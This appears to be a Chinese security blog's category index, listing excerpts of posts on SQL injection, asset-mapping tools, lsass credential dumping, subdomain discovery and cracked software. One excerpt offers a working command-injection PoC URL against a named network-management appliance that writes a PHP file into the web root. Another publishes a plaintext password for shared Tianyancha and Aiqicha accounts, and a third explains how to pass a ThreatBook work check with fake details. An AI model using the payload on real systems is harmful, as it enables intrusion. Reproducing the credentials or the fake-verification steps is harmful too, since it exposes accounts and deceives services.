网络上的那些事儿
分类「网络」下的文章
百日行动丨贩卖上亿条公民个人信息获利三千万,这帮人可真“刑” 2022-08-06
近日,杭州网警紧密结合夏季治安打击整治 “百日行动”,成功破获一起侵犯公民个人信息案。该案手段新颖、涉众面广,利用皮包公司与企业开展虚假合作骗取上亿条公民个人信息。截至目前,警方共抓获犯罪嫌疑人 12 名,依法采取刑事强制措施 11 名,查获涉及公民个人信息数据 4 亿余条,扣押计算机、手机、硬盘等作案设备 50 余件,涉案资金 3 千万元。“三有” 团伙:有技术、有案底、有野心年轻的贾某和...
AsamF发布更新了,增加了许多功能 2022-08-06
https://github.com/Kento-Sec/AsamF增加:优化各个平台的取key,通过 -fk -hk -qk -zk 可以分别取key;新增了判断ip是否为蜜罐功能;-domian、-app、-host、-title、-port、-server、-ih 这几个选项会聚合平台来搜索。具体见-h描述。-fofatotal 可以配合 -fields 使用,默认值为title。-z...
2022年最详细的SQL注入总结笔记 2022-08-04
一、sql注入概述SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息,在实战和测试中,难免会遇见到一些sql注入,下面,我将总结一些常用sql注入中的不同姿势。二、寻找sql注入测试...
为了买套 Java 的交易所,上当了, 1000U 已经离我而去。 2022-08-04
Bico Global 合约交易期权交易介绍https://www.bicopromax.comh5.bicopromax.com此演示站所有者是骗子,声明是自己开发的,支付 1000U 后搭建半成品,催尾款,说需要时间测试下,结果小飞机拉黑了,虽然之前购买的时候已经做好被黑准备,但是现在真正发生了,还是忍不住要 FuC**。骗子的联系方式:@BicoGlobalQQ443518663这套系...
分享一个企业备案查询的脚本-2 2022-08-04
声明:本资料仅供学习交流,严禁使用于商业、非法用途!!!之前不是发了一个备案查询的脚本嘛,详情可见有师傅反应说接口数据不太对,因为那个接口用的都是缓存库,确实太老了,新的得vip(手动狗头)根据我的需求确实能满足,以下改的就纯单学习交流了,获取的还是比之前要全很多另外师傅们注意,还是根据需求来写的,所以仅限根据企业名称获取备案功能!!!还有,没去细扣js了,直接用的selenium,师傅们如...
交行活动总结 2022-08-04
1、福利季月月有礼交通银行APP-搜索“交行福利季”-交行福利季月月有礼好运连连完成任务,可抽3次0.88~888元支付券(月月支付有礼充值余额宝这些就行)2、福利季七夕有礼交通银行APP-搜索“福利季”-福利季七夕专场完成任务,可抽1次2~88元支付券。3、羊毛月刊观看礼交通银行APP首页-热门活动“羊毛8月刊”-活动推荐“观看有礼”视频界面右侧福袋图标进去抽1.8~5.8元支付券。4、福...
批量打印PrintConductor 办公利器 2022-08-04
关键是,界面简单,操作方便,能打印的格式都可以批量打印,测试文件有:dwg.cdr.xlsx.pdf.pptx.psd.pub.txt.docx.png文件已经让我制作单文件首次打开是英文状态,设置中文语言后,每次打开软件默认中文了,因为是单文件所以每次打开都要输入激活码,点取消即可,不影响使用。Win7和10亲测
正版阿香婆音乐软件限时免费领取永久授权 Ashampoo Music Studio 2022 中文版 2022-08-04
正版阿香婆音乐软件限时免费领取永久授权 Ashampoo Music Studio 2022 中文版德国老牌软件开发商Ashampoo再次推出正版限制软件活动。这次分享君给大家分享一个音乐工作室软件,对于喜欢管理音乐的用户,可以用它来更好地管理自己的音乐收藏。Ashampoo Music Studio 2022是一款面向音乐爱好者的完整数字音乐解决方案,软件可以为您的音乐项目设计一个合适的封...
AsamF,一款集成Fofa、Hunter、Quake、Zoomeye的快捷资产搜集工具 2022-08-03
https://github.com/Kento-Sec/AsamFAsamF是一款集成多个网络资产测绘平台的搜索工具.每个平台均可以填写多个key,默认使用编号1的key ,使用-k 来进行切换key使用有什么问题跟需求,可以留言给我。使用方法:./AsamF -fofa 'body="网络空间测绘"'./AsamF -hunter 'apache'./AsamF -hunter 'apa...
记获取CVE编号之路 2022-08-03
1、CVE概述CVE 是通用漏洞披露(Common Vulnerabilities and Exposures)的英文缩写,列出了已公开披露的各种计算机安全缺陷。CVE 识别号由 CVE 编号管理机构(CNA)分配。全球目前约有 100 个 CNA,包括各大 IT 供应商以及安全公司和研究组织。2、如何获取CVE之前还没有去获取编号之前一直以为CVE编号很难申请,也查询了很多资料去看如何才能...
wss下注游戏辅助 2022-08-02
程序的页面,是关于什么什么飞鸟的下注游戏辅助,通过大量的号去跑后缀注单奖wss协议参数解密跟js参数解密协议核心代码最后的运行效果截图对wss协议感兴趣的朋友可以看一下
多种dump lsass思路和工具汇总 2022-08-02
红队技巧-绕过杀软dump-Lsass内存 Gamma实验室微信公众号https://mp.weixin.qq.com/s/QFRCMX14WJwMfM4_AEzpMg【技术分享】转储lsass的方法原理和实现学习 安全客微信公众号https://mp.weixin.qq.com/s/Vfecs_dk5Jt86VeqFaoWIg利用远程进程分叉转存Lsass凭据 小...
电信诈骗之论如何获取一个超过80人规模的裸聊敲诈团伙PC 2022-08-02
裸聊敲诈是目前为止从2019年开始就持续上升的一种新类型的敲诈手段,从去年圈内有一个小伙子中招开始我以为是个例,但是随着时间的发展,身边越来越多的人被敲诈,找我的都至少有三个例。这种敲诈手段比较新颖,主要有几个特点:投资少,操作简单,获利高。下面是我针对一个80多人裸聊敲诈团伙的分析拓扑图咋们再来讨论一下关于如何获取到的这80多人PC权限的。对于大规模的PC权限获取,我们不妨可以从诈骗者身上...
子域名收集工具(burp插件) 2022-08-01
项目地址:https://github.com/Acmesec/Sylas主动搜索设定好根域名之后,会从历史流量中抓取与根域名相关的所有子域名展示并且储存到数据库中。被动搜索当使用burp代理时,会从经过burp的流量中抓取域名进行储存。不需要开启,插件启动以及数据库连接之后就会自动拉取。相似域名模糊匹配会对相似的域名进行匹配,符合正则的就拉取入库支持mysql/sqlite我们打算思考一下...
微步个人账户查询权限提升(适合刚刚注册的0级新号 虚拟资料秒工作认证) 2022-08-01
微步个人账户查询权限提升(适合刚刚注册的0级新号 虚拟资料秒工作认证)注册官网https://x.threatbook.com/;我们这里换邮箱注册 利于跳过手机认证邮箱注册(proton)官网https://mail.proton.me/;注册成功之后我们在切回微步注册微步注册我们这里切邮箱注册然后注册成功以后切个人主页到工作认证然后我们这里需要一个腾讯企业邮箱账号腾讯企业邮箱之前买的一个...
技战法总结 2022-08-01
很早之前的技战法了,可以在改动完善一下,不过推荐各位师傅仅供参考0day漏洞防护伪装 、异构、阻断、拦截、诱捕、排查 6步法1、伪装关键应用指纹伪装常用中间件、更改http协议header头的server字段。可将linux改为IIS6.0。修改中间件配置文件,将移动通讯app的web服务页面配置成“错误”页面返回信息。修改网关系统配置指纹,将邮件系统指纹改为“Moresec HoneyPo...
搬运几个近期poc 2022-08-01
某信-上网行为管理系统一句话/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0aBase64 版/view/IPV6/naborTable/static_convert.php?blocks[...
分享一个企业备案查询的脚本 2022-08-01
事情是这样的,最近打了很多攻防类的演练项目,基本都是各种比赛各种卷,而目标一般会给出大批企业名称、域名或ip域名跟ip倒好说,现有的工具能支撑我从找子域到扫端口再到漏扫一条龙服务但之前好几次都在开头收集企业域名给卡住了,然后比别家慢一拍,很多报告交上去都是无效,在别人后面吃灰目前参加的比赛开始或中后期都会给出一大批只有企业名称的公共目标,数量几百或几千,而且有部分比赛的规则里目标是不包括子公...
【账号共享】天眼查、爱企查账号分享 2022-08-01
最好网页登录:天眼查账号:13217436447 密码:Lsy20141109 有效期2024年03月07日爱企查账号: Liusoon97 密码:Lsy20141109 有效期:2022年09月28日
微信分享二维码
微信里点“发现”,扫一下
二维码便可将本文分享至朋友圈。